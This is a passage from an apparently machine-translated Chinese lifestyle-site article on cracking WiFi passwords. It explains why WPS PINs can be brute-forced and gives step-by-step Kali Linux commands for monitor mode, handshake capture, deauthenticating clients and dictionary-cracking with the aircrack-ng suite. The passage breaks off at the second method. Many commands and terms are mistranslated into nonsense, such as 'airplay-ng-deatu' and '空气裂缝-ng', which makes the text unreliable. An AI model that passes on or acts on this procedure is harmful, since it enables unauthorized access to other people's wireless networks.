浙江龙网

  1. 首页 > 生活百科 > >

专破加密的wifi软件 破解无线网络密码( 三 )

越众创业网


3.pin码破解WiFi密码
在早期的无线路由器中 , wps功能是开启的 。简单来说 , 这个功能就是为了方便设备连接WiFi而设置了一个8位纯数字串 , 不用每次都输入繁琐的密码 。客户端可以通过pin码快速关联路由器WiFi 。wps的初衷是方便用户连接WiFi , 但却成了破解WiFi最有效的手段 , 因为8位纯pin码只有1亿种可能的组合 , 而由于最后一位是前7位的校验和 , 所以只需要猜前7位 , 就只有1000万种可能的组合可以猜 。而且由于发送pin码是为了连接WiFi , pin的前四位的错误内容和后三位的错误信息是不一样的 , 所以你只需要猜测前四位 , 然后猜测前四位正确后的后三位 , 最后一位校验和终究是可以自动计算出来的 , 所以实际操作中你最多只需要猜测10000+1000种组合 。通常 , 我们每两秒钟尝试一次pin , 因此理论上 , it WiFi需要长达六个小时来猜测目标路由器的pin , 然后获得它 。
需要注意的是 , 虽然pin码破解WiFi被认为是最有效的WiFi破解方式 , 但在实践中并不容易实现 。第一 , 由于pin码不安全的问题已经被无线路由器的厂商广泛重视 , 如今购买的无线路由器的wps功能已经基本取消 。第二 , 在pin的过程中 , 需要不断的发送pin码给目的路由器尝试 , 对方路由器还要返回响应消息 。有时候由于路由器本身的不稳定或者路由器的性能问题 , 路由器在不知不觉中被我们的pin杀死 , 导致猜测无法继续或者路由器在收到太多错误的pin码后会自动休息一段时间 , 在此期间不会收到pin码 , 导致对我们pin码的猜测时间过长且无意义 。
三 。裂解过程实例说明准备工具1.笔记本
2.USB无线网卡(必需)
3 .卡利系统
4.密码字典
第一种方法【专破加密的wifi软件 破解无线网络密码】暴力破解法
什么是暴力破解?事实上 , 这意味着一个接一个地尝试密码 , 直到找到正确的密码 。
现在wifi一般加密如下:
1.WEP(有线等效加密)-采用WEP64位或128位数据加密 。
2.WPA-PSK[TKIP]-使用预共享密钥的WI-FI保护访问 , WPA-PSK标准加密技术和TKIP加密类型 。
3.WPA-PSK[TKIP]+WPA2-PSK[AES]-允许客户使用WPA-PSK[TKIP]或WPA2-PSK[AES] 。
开始实验:第一步
输入kali , 并在终端输入以下内容
措置惩罚网卡事情规范范式
列出网卡信息

2.第二步
输入:
airmon-ng启动wlan0
打开网卡监控

您可以使用ifconfig命令来检查网卡信息:
命令
您可以看到网卡的名称已经更改

3.第三步
airodump-ng wlan0mon
扫描wifi信号

在这里 , 我用自己的wifi做实验 。
第四步
从上图可以看出
BSSID是50:3A:A0:33:B2:8C频道(CH)是:2
输入:
airodump-ng-w freedom-C2-–bssid 50:3A:A0:33:B2:8C WLAN 0 mon–忽略-负一
抓住离合器 。
-c:指定频道
-w:指定手拿包的存放位置或名称 , 自由是后面要抢的手拿包的名称 。
- bssid:指定路由器的MAC 。


第五步
打开另一个终端 , 输入命令:
airplay-ng-deatu 10-a路由器MAC -c客户端MAC
WLAN 0 mon –-忽略-负一
使用airplay-ng工具强制断开连接wifi的设备 , 重新连接路由器抓取数据包 。
–-deatu:指定要发送的反验证数据包的数量 , 或者-0(阿拉伯数字0)可用于指定反验证数据包的数量 。
-a:指定路由器的MAC 。
-c:指定客户端的MAC 。

6.第六步
破解握手包

空气裂缝-ng -a -w字典自由 。帽子
-a1:指定WEP加密方法
-a2:指定WPA-PSk加密方法
字典:字典的名字
自由-* 。帽子:握手包

这是我的wifi密码

破解成功靠的是强大的字典和运气 。
第二种方法第一步
Wash会在WPS打开的情况下扫描网络
wash -i wlan0mon [-C]


由于周围没有开启WPS功能的wifi , 所以会出现如上图所示 。这时候先别急 , 因为有些比较隐蔽 , 所以直接来 。
使用之前的命令扫描wifi:
airodump-ng wlan0mon

如果看到边肖圈出来的MAC , 选择PWR绝对值小于70的wifi破解 。
2.第二步

推荐阅读


上一篇:华谊兄弟的爷爷是谁 王中军 王中磊

下一篇:带你认识真正的“龟息大法” 龟息大法